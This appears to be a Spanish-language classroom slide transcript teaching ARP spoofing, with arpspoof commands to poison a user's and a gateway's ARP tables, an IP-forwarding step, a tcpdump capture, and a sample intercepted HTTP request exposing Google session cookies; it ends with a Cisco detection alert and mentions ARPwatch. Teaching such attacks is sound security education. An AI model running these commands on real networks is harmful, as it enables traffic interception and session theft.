Como hacer ARP Spoofing

Como hacer ARP SpoofingSesion 3

Como hacer ARP Spoofing

Una de mejores formas de solucionar un problema, es saber cual es y creo que no hay mejor forma de entenderlo que intentar hacerlo. Hoy vamos a ver como hacer ARP Spoofing (también llamado ARP Poisoning)

Esquema inicial


Vamos a suponer una red ficticia: 172.16.0.0/12, en la cual el gateway esta en la 172.16.0.1 y existen dos hosts: 172.16.0.2 (el usuario) y 172.16.0.3 (el atacante)

Para simplificar, la MAC de los equipos corresponderá a el último byte de la IP. Por ejemplo, si la IP es 172.16.0.1, asumiremos que si MAC es 00:00:00:00:00:01


Mediante arpspoof podemos realizar el spoofing mediante los siguientes parámetros:

-i: interfaz en el que haremos el spoofing -t: El target a quien le vamos a decir nuestra MAC La IP del host que queremos suplantar


Para evitar que se corte el trafico del usuario deberemos activar IP forwarding. Simplemente deberemos hacer un echo al proc:

echo 1 > /proc/sys/net/ipv4/ip_forward


A continuación deberemos envenenar la tabla ARP de tanto el gateway como el usuario para obtener hacer pasar el tráfico por el sistema del atacante en ambas direcciones:

arpspoof -i eth0 -t 172.16.0.2 172.16.0.1

Envenenando la tabla ARP del usuario


A continuación hacemos lo mismo (en paralelo) con el gateway: arpspoof -i eth0 -t 172.10.0.1 172.16.0.2

Envenenando la tabla ARP del gateway


Con esto ya podemos hacer un tcpdump en el equipo atacante para capturar todo el tráfico del usuario:

tcpdump -nni eth0 'host 172.16.0.2' -s 0 -w /tmp/all.your.packet.are.belong.to.us

Equipo haciendo ARP Spoofing

Como hacer ARP Spoofing Un ejemplo de tráfico HTTP que podríamos ver sería: GET http://www.google.es/search?

hl=es&source=hp&q=HOLA&btnG=Buscar+con+Google&meta=&aq=f&oq= HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.6; Google-TR-5.9.911.3589-es)

Gecko/20091201 Firefox/3.5.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://www.google.com/ Cookie: SS=Q0=bWFuIG5j;

PREF=ID=0d7e92f0a892dcdb:U=a0d7411c93a9da83:TM=1261735618:LM=1261735947:S=usa2aENTuGjs6433; NID=30=E85Pp_GbpOrzO3dZsK8DqZiZ08XdR-C8BuJ3sEFDN5DHuw2TY8ew0a_QE_q8R6XNDEE439iNspdpZUOLexoMb

jHOcepayTpXPMwsxFNgAK951t59ZSaXI0qNxq0xQ0wg; SID=DQAAAIUAAACDMrYRGnoD5BYlPIKfMF1oOgds-T_bIw7Ynjy6wVbkOIDSglRTdglRiVY8VFb44ndsuboemg6oMecz-a8y8bprLcUh0U0Kkij68JSc2aYCyldfKVIZyO518ywtcjTvozNh9v3Vrvf25OwTypC9F9h

4oUWfQnHxY6AGpcPtecNo1f4QvHD3maLGRuh-uE89Ju8; HSID=AX3Vf3Lm0i2yz9st-


En equipos CISCO en este tipo de ataques se generaría una alerta similar a la siguiente:

Dec 31 09:53:10 MET: %SW_MATM-4-MACFLAP_NOTIF: Host 000a.aaac.007f in vlan 10 is flapping between port Gi0/1 and port Gi0/2

Existen diferentes herramientas para detectar este tipo de ataques, siendo el más conocido el ARPwatch.

Como hacer ARP Spoofing

Education

Transcript of Como hacer ARP Spoofing